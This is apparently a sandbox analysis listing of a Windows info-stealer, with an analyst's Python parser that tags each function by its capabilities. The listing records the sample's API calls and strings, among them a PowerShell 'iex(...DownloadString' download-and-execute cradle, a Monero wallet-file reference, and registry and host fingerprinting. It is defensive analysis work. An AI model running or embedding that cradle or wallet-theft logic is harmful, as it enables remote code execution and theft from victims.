                        • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 00F04FCA
                        • RtlAllocateHeap.NTDLL(00000000), ref: 00F04FD1
                        • InternetOpenA.WININET(00F20DDF,00000000,00000000,00000000,00000000), ref: 00F04FEA
                        • InternetOpenUrlA.WININET(?,00000000,00000000,00000000,04000100,00000000), ref: 00F05011
                        • InternetReadFile.WININET(?,?,00000400,00000000), ref: 00F05041
                        • InternetCloseHandle.WININET(?), ref: 00F050B9
                        • InternetCloseHandle.WININET(?), ref: 00F050C6
                        Memory Dump Source
                        • Source File: 00000000.00000002.2091263076.0000000000F01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                        Yara matches
                        Similarity
                        • API ID: Internet$CloseHandleHeapOpen$AllocateFileProcessRead
                        • String ID:
                        • API String ID: 3066467675-0
                        • Opcode ID: 3b43f01d2caa602bc162db2c050849863e49dee225ad9488b2c6fa5af5c67d8b
                        • Instruction ID: b610cb0c1e475c02ef2a4f5ffbb2380de286db9643a41c229f3f3906fdf1bbb7
                        • Opcode Fuzzy Hash: 3b43f01d2caa602bc162db2c050849863e49dee225ad9488b2c6fa5af5c67d8b
                        • Instruction Fuzzy Hash: A4312AB5A40218ABDB24CF54DC85BDDB7B4EF48705F1081E8E60AA7284C7746AC59F98
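Every function block on this page has the same layout: an `APIs` list whose entries carry a `ref:` call-site address and an optional `Part of subcall function` marker, an optional `Strings` list with `xrefs:`, and the `API ID` / `String ID` / `Opcode ID` fields. The following is an added example, my own code and not anything shipped by Joe Sandbox, that parses that layout into records and tags each function by the capability its direct (non-subcall) API calls imply. `SAMPLE` is copied from two blocks on this page (the WinINet download routine above and the ShellExecuteEx routine further down) with the repeated Associated lines left out; `CAPABILITY_APIS` is my own assumed mapping from API names to coarse tags.

```python
# Parser for the per-function blocks of a Joe Sandbox function listing.
# Added example (my code, not Joe Sandbox's). SAMPLE is copied from two blocks
# on this page; CAPABILITY_APIS is an assumed mapping from API names to tags.
from __future__ import annotations

import re
from dataclasses import dataclass, field

RE_API = re.compile(
    r"^•\s*(?:Part of subcall function (?P<sub>[0-9A-F]+): )?"
    r"(?P<name>\w+)\.(?P<mod>\w+)(?:\((?P<args>[^)]*)\))?,? ref: (?P<ref>[0-9A-F]+)$")
RE_FIELD = re.compile(r"^•\s*(?P<key>API ID|String ID|Opcode ID): ?(?P<val>.*)$")
RE_STRING = re.compile(r"^•\s*(?P<val>.*), xrefs: (?P<ref>[0-9A-F]+)$")

# Assumed: which direct API calls indicate which coarse capability.
CAPABILITY_APIS = {
    "http-download": {"InternetOpenA", "InternetOpenUrlA", "InternetReadFile"},
    "registry-read": {"RegOpenKeyExA", "RegQueryValueExA", "RegEnumKeyExA"},
    "process-launch": {"ShellExecuteEx", "CreateProcessA", "WinExec"},
    "file-read": {"CreateFileA", "ReadFile", "FindFirstFileA"},
    "host-fingerprint": {"GlobalMemoryStatusEx"},
}

@dataclass
class ApiCall:
    name: str
    module: str
    args: list[str]
    ref: str              # call-site address
    subcall: str | None   # set when the call sits in a callee, not this function

@dataclass
class FunctionRecord:
    apis: list[ApiCall] = field(default_factory=list)
    strings: list[str] = field(default_factory=list)
    fields: dict[str, str] = field(default_factory=dict)

def parse(text: str) -> list[FunctionRecord]:
    """Start a new record at each 'APIs' header; ignore lines we do not model."""
    records: list[FunctionRecord] = []
    cur: FunctionRecord | None = None
    for raw in text.splitlines():
        line = raw.strip()
        if line == "APIs":
            cur = FunctionRecord()
            records.append(cur)
            continue
        if cur is None or not line:
            continue
        if m := RE_API.match(line):
            args = [a for a in (m["args"] or "").split(",") if a]
            cur.apis.append(ApiCall(m["name"], m["mod"], args, m["ref"], m["sub"]))
        elif m := RE_FIELD.match(line):
            cur.fields[m["key"]] = m["val"]
        elif m := RE_STRING.match(line):
            cur.strings.append(m["val"])
    return records

def capabilities(rec: FunctionRecord) -> set[str]:
    """Tag a function by its own (non-subcall) calls plus its string evidence."""
    direct = {a.name for a in rec.apis if a.subcall is None}
    tags = {tag for tag, names in CAPABILITY_APIS.items() if direct & names}
    blob = " ".join(rec.strings + [rec.fields.get("String ID", "")]).lower()
    if "process-launch" in tags and "powershell" in blob and "downloadstring" in blob:
        tags.add("powershell-download-cradle")
    return tags

# Copied from this page (two blocks, Associated lines omitted).
SAMPLE = r"""APIs
• InternetOpenA.WININET(00F20DDF,00000000,00000000,00000000,00000000), ref: 00F04FEA
• InternetOpenUrlA.WININET(?,00000000,00000000,00000000,04000100,00000000), ref: 00F05011
• InternetReadFile.WININET(?,?,00000400,00000000), ref: 00F05041
• InternetCloseHandle.WININET(?), ref: 00F050B9
Memory Dump Source
• Source File: 00000000.00000002.2091263076.0000000000F01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
Similarity
• API ID: Internet$CloseHandleHeapOpen$AllocateFileProcessRead
• String ID:
• Opcode ID: 3b43f01d2caa602bc162db2c050849863e49dee225ad9488b2c6fa5af5c67d8b
APIs
  • Part of subcall function 00F1A740: lstrcpy.KERNEL32(00F20E17,00000000), ref: 00F1A788
• ShellExecuteEx.SHELL32(0000003C), ref: 00F12D85
Strings
• C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, xrefs: 00F12D04
• -nop -c "iex(New-Object Net.WebClient).DownloadString(', xrefs: 00F12CC4
• ')", xrefs: 00F12CB3
Similarity
• API ID: lstrcpy$lstrcat$ExecuteShelllstrlen
• Opcode ID: 33d69c62be5d97bcd8a43051a615279ba3224aa2fb97d9d3ad33caf3c51c062f
"""

if __name__ == "__main__":
    for rec in parse(SAMPLE):
        print(rec.fields.get("Opcode ID", "?")[:16], sorted(capabilities(rec)))
```

Subcall entries are kept but excluded from tagging on purpose: a `Part of subcall function` line describes a callee that many functions share, so counting it would tag every caller of a string helper with that helper's capability. Feed the whole exported listing through `parse` to get one record per function and grep the tags instead of scrolling the HTML.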
                        APIs
                        • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00000000,00000000,?,008AEB10,00000000,?,00F20E2C,00000000,?,00000000), ref: 00F18130
                        • RtlAllocateHeap.NTDLL(00000000), ref: 00F18137
                        • GlobalMemoryStatusEx.KERNEL32(00000040,00000040,00000000), ref: 00F18158  [00000040 = sizeof(MEMORYSTATUSEX), the required dwLength; the "%d MB" format in the String ID below turns the physical-memory figure into megabytes]
                        • wsprintfA.USER32 ref: 00F181AC
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2091263076.0000000000F01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_f00000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Heap$AllocateGlobalMemoryProcessStatuswsprintf
                        • String ID: %d MB$@
                        • API String ID: 2922868504-3474575989
                        • Opcode ID: e8689726505c4cc7184b74f7e1249396682a01428f6e658c293769576728ec59
                        • Instruction ID: bb925274167e726a64d8d5833be2ad95c252675e34b372a4401ac8f7e2700599
                        • Opcode Fuzzy Hash: e8689726505c4cc7184b74f7e1249396682a01428f6e658c293769576728ec59
                        • Instruction Fuzzy Hash: 69218EB2E44218ABDB14DFD4DD49FAEB7B8FB44B00F104218F615BB280C77869418BA5
                        APIs
                        • RegEnumKeyExA.ADVAPI32(00000000,00000000,?,00000400,00000000,00000000,00000000,00000000), ref: 00F18426
                        • wsprintfA.USER32 ref: 00F18459
                        • RegOpenKeyExA.ADVAPI32(00000000,?,00000000,00020019,00000000), ref: 00F1847B  [00020019 = KEY_READ; each subkey name from RegEnumKeyExA is joined with "%s\%s" and opened in turn]
                        • RegCloseKey.ADVAPI32(00000000), ref: 00F1848C
                        • RegCloseKey.ADVAPI32(00000000), ref: 00F18499
                          • Part of subcall function 00F1A7A0: lstrcpy.KERNEL32(?,00000000), ref: 00F1A7E6
                        • RegQueryValueExA.ADVAPI32(00000000,008AEA50,00000000,000F003F,?,00000400), ref: 00F184EC
                        • lstrlen.KERNEL32(?), ref: 00F18501
                        • RegQueryValueExA.ADVAPI32(00000000,008AEB88,00000000,000F003F,?,00000400,00000000,?,?,00000000,?,00F20B34), ref: 00F18599
                        • RegCloseKey.ADVAPI32(00000000), ref: 00F18608
                        • RegCloseKey.ADVAPI32(00000000), ref: 00F1861A
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2091263076.0000000000F01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_f00000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Close$QueryValue$EnumOpenlstrcpylstrlenwsprintf
                        • String ID: %s\%s
                        • API String ID: 3896182533-4073750446
                        • Opcode ID: 47d870f5ec0911b74a5d94a4752a711950e0398ee4c50df948bd1e32f714b57e
                        • Instruction ID: e20c47855d02833c9d86588ce1c47f3f968ad2d1964e2f83126731d2a2175da0
                        • Opcode Fuzzy Hash: 47d870f5ec0911b74a5d94a4752a711950e0398ee4c50df948bd1e32f714b57e
                        • Instruction Fuzzy Hash: FE210A759402189BDB24DB54DD85FE9B3B8FF48711F00C1A8A60A97180DF716AC6CFD4
                        APIs
                        • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00F176A4
                        • RtlAllocateHeap.NTDLL(00000000), ref: 00F176AB
                        • RegOpenKeyExA.ADVAPI32(80000002,0089C8A8,00000000,00020119,00000000), ref: 00F176DD  [80000002 = HKEY_LOCAL_MACHINE; 00020119 = KEY_READ | KEY_WOW64_64KEY, so this 32-bit process deliberately reads the native 64-bit registry view rather than the WOW6432Node redirection]
                        • RegQueryValueExA.ADVAPI32(00000000,008AEBB8,00000000,00000000,?,000000FF), ref: 00F176FE
                        • RegCloseKey.ADVAPI32(00000000), ref: 00F17708
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2091263076.0000000000F01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_f00000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Heap$AllocateCloseOpenProcessQueryValue
                        • String ID: Windows 11
                        • API String ID: 3225020163-2517555085
                        • Opcode ID: cd2309ba5f7ac48822a5b0e8b609b217a5359b4912c90c0510ad8161fc010faf
                        • Instruction ID: 91bbdab40408effc7e75dcd58d8f73a1ecafc24d497f9dba79e52ed31caeea28
                        • Opcode Fuzzy Hash: cd2309ba5f7ac48822a5b0e8b609b217a5359b4912c90c0510ad8161fc010faf
                        • Instruction Fuzzy Hash: E20184B9A44304BBE714EBE0E849FAD77BCEF04B01F004064FA16D7285D67499809B50
                        APIs
                        • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00F17734
                        • RtlAllocateHeap.NTDLL(00000000), ref: 00F1773B
                        • RegOpenKeyExA.ADVAPI32(80000002,0089C8A8,00000000,00020119,00F176B9), ref: 00F1775B  [HKEY_LOCAL_MACHINE, KEY_READ | KEY_WOW64_64KEY; same key pointer 0089C8A8 as the "Windows 11" routine above]
                        • RegQueryValueExA.ADVAPI32(00F176B9,CurrentBuildNumber,00000000,00000000,?,000000FF), ref: 00F1777A  [the ProductName value still reads "Windows 10 ..." on Windows 11, so the build number (22000 and above) is the reliable discriminator]
                        • RegCloseKey.ADVAPI32(00F176B9), ref: 00F17784
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2091263076.0000000000F01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_f00000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Heap$AllocateCloseOpenProcessQueryValue
                        • String ID: CurrentBuildNumber
                        • API String ID: 3225020163-1022791448
                        • Opcode ID: 7f2c895a1a16776dca72dd2718a7aff673366b29ad31e3770f7be37c1c3215b8
                        • Instruction ID: 091302e43244f147f5f913cc769d486a4bf96061eabce54f89faac1fdb4d3653
                        • Opcode Fuzzy Hash: 7f2c895a1a16776dca72dd2718a7aff673366b29ad31e3770f7be37c1c3215b8
                        • Instruction Fuzzy Hash: C60167B9A40309BBE714DBE0EC49FAEB7BCEF44B01F004164FA16A7285DA755540CF51
                        APIs
                        • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00F099EC  [80000000 = GENERIC_READ, 00000001 = FILE_SHARE_READ, 00000003 = OPEN_EXISTING: read-only open of an existing file]
                        • GetFileSizeEx.KERNEL32(000000FF,?), ref: 00F09A11
                        • LocalAlloc.KERNEL32(00000040,?), ref: 00F09A31  [00000040 = LPTR, fixed and zero-initialised; sized from GetFileSizeEx so the whole file is read into one buffer]
                        • ReadFile.KERNEL32(000000FF,?,00000000,00F0148F,00000000), ref: 00F09A5A
                        • LocalFree.KERNEL32(00F0148F), ref: 00F09A90
                        • CloseHandle.KERNEL32(000000FF), ref: 00F09A9A
                        Memory Dump Source
                        • Source File: 00000000.00000002.2091263076.0000000000F01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_f00000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: File$Local$AllocCloseCreateFreeHandleReadSize
                        • String ID:
                        • API String ID: 2311089104-0
                        • Opcode ID: 9ab746f6d8571042a1775b976b3c3e856bafa284c91201f871745848e61e6234
                        • Instruction ID: ebd431bcb119139fc00a1b694d848d1b7c8eeb8543eea96de94c6021b2b8db28
                        • Opcode Fuzzy Hash: 9ab746f6d8571042a1775b976b3c3e856bafa284c91201f871745848e61e6234
                        • Instruction Fuzzy Hash: B3314D74E00209EFDB24CF94D885BAEB7B4FF48711F108158E912A72C0D779A981DFA0
                        APIs
                        • lstrcat.KERNEL32(?,008AED50), ref: 00F147DB
                          • Part of subcall function 00F18DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00F18E0B  [0000001C = CSIDL_LOCAL_APPDATA; the lstrcat chain below builds a search path under it for FindFirstFileA]
                        • lstrcat.KERNEL32(?,00000000), ref: 00F14801
                        • lstrcat.KERNEL32(?,?), ref: 00F14820
                        • lstrcat.KERNEL32(?,?), ref: 00F14834
                        • lstrcat.KERNEL32(?,0089C1D8), ref: 00F14847
                        • lstrcat.KERNEL32(?,?), ref: 00F1485B
                        • lstrcat.KERNEL32(?,008ADF38), ref: 00F1486F
                          • Part of subcall function 00F1A740: lstrcpy.KERNEL32(00F20E17,00000000), ref: 00F1A788
                          • Part of subcall function 00F18D90: GetFileAttributesA.KERNEL32(00000000,?,00F01B54,?,?,00F2564C,?,?,00F20E1F), ref: 00F18D9F
                          • Part of subcall function 00F14570: GetProcessHeap.KERNEL32(00000000,0098967F), ref: 00F14580
                          • Part of subcall function 00F14570: RtlAllocateHeap.NTDLL(00000000), ref: 00F14587
                          • Part of subcall function 00F14570: wsprintfA.USER32 ref: 00F145A6
                          • Part of subcall function 00F14570: FindFirstFileA.KERNEL32(?,?), ref: 00F145BD
                        Memory Dump Source
                        • Source File: 00000000.00000002.2091263076.0000000000F01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_f00000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcat$FileHeap$AllocateAttributesFindFirstFolderPathProcesslstrcpywsprintf
                        • String ID:
                        • API String ID: 2540262943-0
                        • Opcode ID: 25f0d44325d1d77c537af864cd17b0ea10e2842e2df507a9628a5cbef35af6a0
                        • Instruction ID: 49f17edea16aa003cd57ee892a074524c06dc607bc95c2f34917f562cbfb124c
                        • Opcode Fuzzy Hash: 25f0d44325d1d77c537af864cd17b0ea10e2842e2df507a9628a5cbef35af6a0
                        • Instruction Fuzzy Hash: D03193BAD4020857DB24F7B0DC85EE9737CAF48B00F404598B31696081EE7897C99B91
                        APIs
                          • Part of subcall function 00F1A740: lstrcpy.KERNEL32(00F20E17,00000000), ref: 00F1A788
                          • Part of subcall function 00F1A9B0: lstrlen.KERNEL32(?,008A9B00,?,\Monero\wallet.keys,00F20E17), ref: 00F1A9C5
                          • Part of subcall function 00F1A9B0: lstrcpy.KERNEL32(00000000), ref: 00F1AA04
                          • Part of subcall function 00F1A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00F1AA12
                          • Part of subcall function 00F1A920: lstrcpy.KERNEL32(00000000,?), ref: 00F1A972
                          • Part of subcall function 00F1A920: lstrcat.KERNEL32(00000000), ref: 00F1A982
                          • Part of subcall function 00F1A8A0: lstrcpy.KERNEL32(?,00F20E17), ref: 00F1A905
                        • ShellExecuteEx.SHELL32(0000003C), ref: 00F12D85  [0000003C = sizeof(SHELLEXECUTEINFOA) on x86, the cbSize field; the strings below are the fixed parts of the command line, with the URL inserted between "DownloadString('" and "')" at run time]
                        Strings
                        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, xrefs: 00F12D04
                        • -nop -c "iex(New-Object Net.WebClient).DownloadString(', xrefs: 00F12CC4
                        • <, xrefs: 00F12D39
                        • ')", xrefs: 00F12CB3
                        Memory Dump Source
                        • Source File: 00000000.00000002.2091263076.0000000000F01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_f00000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcpy$lstrcat$ExecuteShelllstrlen
                        • String ID: ')"$-nop -c "iex(New-Object Net.WebClient).DownloadString('$<$C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                        • API String ID: 3031569214-898575020
                        • Opcode ID: 33d69c62be5d97bcd8a43051a615279ba3224aa2fb97d9d3ad33caf3c51c062f
                        • Instruction ID: e0e4d31072517a70cda190959de5c2aaa7d23005fc3dffe8e9d81557cc71a030
                        • Opcode Fuzzy Hash: 33d69c62be5d97bcd8a43051a615279ba3224aa2fb97d9d3ad33caf3c51c062f
                        • Instruction Fuzzy Hash: A741DE71C112089ADB14EBA0DD91FDDB774AF10310F404119E016A71D2EF796ACBEF92
                        APIs
                        • LocalAlloc.KERNEL32(00000040,?), ref: 00F09F41
                          • Part of subcall function 00F1A7A0: lstrcpy.KERNEL32(?,00000000), ref: 00F1A7E6
                          • Part of subcall function 00F1A740: lstrcpy.KERNEL32(00F20E17,00000000), ref: 00F1A788
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2091263076.0000000000F01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_f00000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcpy$AllocLocal
                        • String ID: @$ERROR_RUN_EXTRACTOR$v10$v20
                        • API String ID: 4171519190-1096346117
                        • Opcode ID: 5c93924b093974b69b6aef0ca31022de496de186af808701972a5ae76fe3898a
                        • Instruction ID: 317eb8245b85d95670afe6f7172e8864c285e8ba62c9f07008bee57a527e40fc
                        • Opcode Fuzzy Hash: 5c93924b093974b69b6aef0ca31022de496de186af808701972a5ae76fe3898a
                        • Instruction Fuzzy Hash: 94615C71A00248EBDB24EFA4DD96FED7775AF50310F008018F90A5F1C1EB786A46EB92
                        APIs
                        • RegOpenKeyExA.ADVAPI32(80000001,008AE0B8,00000000,00020119,?), ref: 00F140F4
                        • RegQueryValueExA.ADVAPI32(?,008AECA8,00000000,00000000,00000000,000000FF), ref: 00F14118
                        • RegCloseKey.ADVAPI32(?), ref: 00F14122
                        • lstrcat.KERNEL32(?,00000000), ref: 00F14147
                        • lstrcat.KERNEL32(?,008AED68), ref: 00F1415B
                        Memory Dump Source
                        • Source File: 00000000.00000002.2091263076.0000000000F01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_f00000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcat$CloseOpenQueryValue
                        • String ID:
                        • API String ID: 690832082-0
                        • Opcode ID: 9922885f2b0c9e0d04f67fbd305c1f96862708b7117c81954de9a259622fd65c
                        • Instruction ID: d31f0e7d22adabdfb004fd4fa33ef9291879cc265c4780986b2e122210732ce3
                        • Opcode Fuzzy Hash: 9922885f2b0c9e0d04f67fbd305c1f96862708b7117c81954de9a259622fd65c
                        • Instruction Fuzzy Hash: A441DABAD401086BDB28EBA0EC46FFE373DBB88700F044558B626571C5EA755BC89BD1
                        APIs
                        • GetSystemTime.KERNEL32(?), ref: 00F1696C
                        • sscanf.NTDLL ref: 00F16999
                        • SystemTimeToFileTime.KERNEL32(?,00000000), ref: 00F169B2
                        • SystemTimeToFileTime.KERNEL32(?,00000000), ref: 00F169C0
                        • ExitProcess.KERNEL32 ref: 00F169DA
                        Memory Dump Source
                        • Source File: 00000000.00000002.2091263076.0000000000F01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_f00000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Time$System$File$ExitProcesssscanf
                        • String ID:
                        • API String ID: 2533653975-0
                        • Opcode ID: 9864edc1e743a82aaf647a0cff2552e959599e6c37aaa1b5127d6301f5f4d051
                        • Instruction ID: 02f27ec1afceee5b2e307866cd9ad3d2488b6bc3c8265f4dec2131cc03d1d1b1
                        • Opcode Fuzzy Hash: 9864edc1e743a82aaf647a0cff2552e959599e6c37aaa1b5127d6301f5f4d051
                        • Instruction Fuzzy Hash: F0212CB5D00209ABDF08EFE4E9459EEB7B9FF48300F04852EE016E3244EB345645DB65
                        APIs
                        • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00F17E37
                        • RtlAllocateHeap.NTDLL(00000000), ref: 00F17E3E
                        • RegOpenKeyExA.ADVAPI32(80000002,0089CB10,00000000,00020119,?), ref: 00F17E5E
                        • RegQueryValueExA.ADVAPI32(?,008ADEF8,00000000,00000000,000000FF,000000FF), ref: 00F17E7F
                        • RegCloseKey.ADVAPI32(?), ref: 00F17E92
                        Memory Dump Source
                        • Source File: 00000000.00000002.2091263076.0000000000F01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_f00000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Heap$AllocateCloseOpenProcessQueryValue
                        • String ID:
                        • API String ID: 3225020163-0
                        • Opcode ID: 7c85a5ac0fd2f64ea65c67d619e966ec3dfea4e87e815d7b41b926eed2c04ba7
                        • Instruction ID: 7f597edcea16862c85f832635b8bfaced06f95c8a6b9948442fc33c1b4d88f2b
                        • Opcode Fuzzy Hash: 7c85a5ac0fd2f64ea65c67d619e966ec3dfea4e87e815d7b41b926eed2c04ba7
                        • Instruction Fuzzy Hash: B11191B6A84205EBD724DF94E849FBBBBB8EB04B11F104129F616A7284D77558409FA0
                        APIs
                        • StrStrA.SHLWAPI(008AEBE8,?,?,?,00F1140C,?,008AEBE8,00000000), ref: 00F1926C
                        • lstrcpyn.KERNEL32(0114AB88,008AEBE8,008AEBE8,?,00F1140C,?,008AEBE8), ref: 00F19290
                        • lstrlen.KERNEL32(?,?,00F1140C,?,008AEBE8), ref: 00F192A7
                        • wsprintfA.USER32 ref: 00F192C7
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2091263076.0000000000F01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_f00000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcpynlstrlenwsprintf
                        • String ID: %s%s
                        • API String ID: 1206339513-3252725368
                        • Opcode ID: 334a9097092bf165e0559df5cdab320e80cc3cce452b70975786af2fd2f3d901
                        • Instruction ID: e264974ee88be872d284f93797d6008cf807173ec72861d93b07c6b33f909277
                        • Opcode Fuzzy Hash: 334a9097092bf165e0559df5cdab320e80cc3cce452b70975786af2fd2f3d901
                        • Instruction Fuzzy Hash: 28014C75540108FFCB18DFECE994EAE3BB9EF44751F118548F90A97204C631AA80DB90
                        APIs
                        • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00F012B4
                        • RtlAllocateHeap.NTDLL(00000000), ref: 00F012BB
                        • RegOpenKeyExA.ADVAPI32(000000FF,?,00000000,00020119,?), ref: 00F012D7
                        • RegQueryValueExA.ADVAPI32(?,000000FF,00000000,00000000,?,000000FF), ref: 00F012F5
                        • RegCloseKey.ADVAPI32(?), ref: 00F012FF
                        Memory Dump Source
                        • Source File: 00000000.00000002.2091263076.0000000000F01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_f00000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Heap$AllocateCloseOpenProcessQueryValue
                        • String ID:
                        • API String ID: 3225020163-0
                        • Opcode ID: 5b48c29d077cef8da632719f57594d3369ca46d6c945fe0a67526befcdaeb12d
                        • Instruction ID: 46b2f46761991769b07c104a2fe8d35978d4126567ec20d346ba6fb82e8eb331
                        • Opcode Fuzzy Hash: 5b48c29d077cef8da632719f57594d3369ca46d6c945fe0a67526befcdaeb12d
                        • Instruction Fuzzy Hash: 100136B9A40209BBDB14DFD0E849FAEB7BCEF48B01F008169FA1697284D6759A418F50
                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2091263076.0000000000F01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_f00000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: String___crt$Type
                        • String ID:
                        • API String ID: 2109742289-3916222277
                        • Opcode ID: b54bd4563492e6aae610e5dbe63dc92fd7fd7cc091db3b66282d0137d63c1053
                        • Instruction ID: 1f353fc85b0b7753cb041c76bf62ae7a541f39699c48bc153242f885ae2549cb
                        • Opcode Fuzzy Hash: b54bd4563492e6aae610e5dbe63dc92fd7fd7cc091db3b66282d0137d63c1053
                        • Instruction Fuzzy Hash: EF41077154075C9EDB218B24CC84FFB7FF89F45714F5444E8E9CA86182D2719A84EFA4
                        APIs
                        • GetModuleFileNameA.KERNEL32(00000000,?,00000104,?,0000003C,?,000003E8), ref: 00F16663
                          • Part of subcall function 00F1A740: lstrcpy.KERNEL32(00F20E17,00000000), ref: 00F1A788
                          • Part of subcall function 00F1A9B0: lstrlen.KERNEL32(?,008A9B00,?,\Monero\wallet.keys,00F20E17), ref: 00F1A9C5
                          • Part of subcall function 00F1A9B0: lstrcpy.KERNEL32(00000000), ref: 00F1AA04
                          • Part of subcall function 00F1A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00F1AA12
                          • Part of subcall function 00F1A8A0: lstrcpy.KERNEL32(?,00F20E17), ref: 00F1A905
                        • ShellExecuteEx.SHELL32(0000003C), ref: 00F16726
                        • ExitProcess.KERNEL32 ref: 00F16755
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2091263076.0000000000F01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_f00000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcpy$ExecuteExitFileModuleNameProcessShelllstrcatlstrlen
                        • String ID: <
                        • API String ID: 1148417306-4251816714
                        • Opcode ID: 70e8b5cc85774465d93c81ccfb2ebcc885037bbf5c652a6082c6321c9d1d9812
                        • Instruction ID: 4ef508cbf403d7ea834a58f77b55a5b32eb76544c5df942d6f0a102bc8c987cd
                        • Opcode Fuzzy Hash: 70e8b5cc85774465d93c81ccfb2ebcc885037bbf5c652a6082c6321c9d1d9812
                        • Instruction Fuzzy Hash: 8E314DB1C01218ABDB14EB90DD91FDE7778AF04710F804198F21667181DF786B89DF55
                        APIs
                        • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00F20E28,00000000,?), ref: 00F1882F
                        • RtlAllocateHeap.NTDLL(00000000), ref: 00F18836
                        • wsprintfA.USER32 ref: 00F18850
                          • Part of subcall function 00F1A740: lstrcpy.KERNEL32(00F20E17,00000000), ref: 00F1A788
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2091263076.0000000000F01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_f00000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Heap$AllocateProcesslstrcpywsprintf
                        • String ID: %dx%d
                        • API String ID: 1695172769-2206825331
                        • Opcode ID: 242b2a8b9d6344fbe893bf834a03fb3eeeb104d778028250289549fe397539cb
                        • Instruction ID: 879c11a0affde444d68c6483d10cb42c581e05b36406dc4857182675aed5f540
                        • Opcode Fuzzy Hash: 242b2a8b9d6344fbe893bf834a03fb3eeeb104d778028250289549fe397539cb
                        • Instruction Fuzzy Hash: 9A21A5B5A80204AFDB14DF94ED45FAEBBB8FF48B01F104118F616A7284C7799941CBA0
                        APIs
                        • GetProcessHeap.KERNEL32(00000000,000000FA,?,?,00F1951E,00000000), ref: 00F18D5B
                        • RtlAllocateHeap.NTDLL(00000000), ref: 00F18D62
                        • wsprintfW.USER32 ref: 00F18D78
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2091263076.0000000000F01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                        Joe Sandbox IDA Plugin
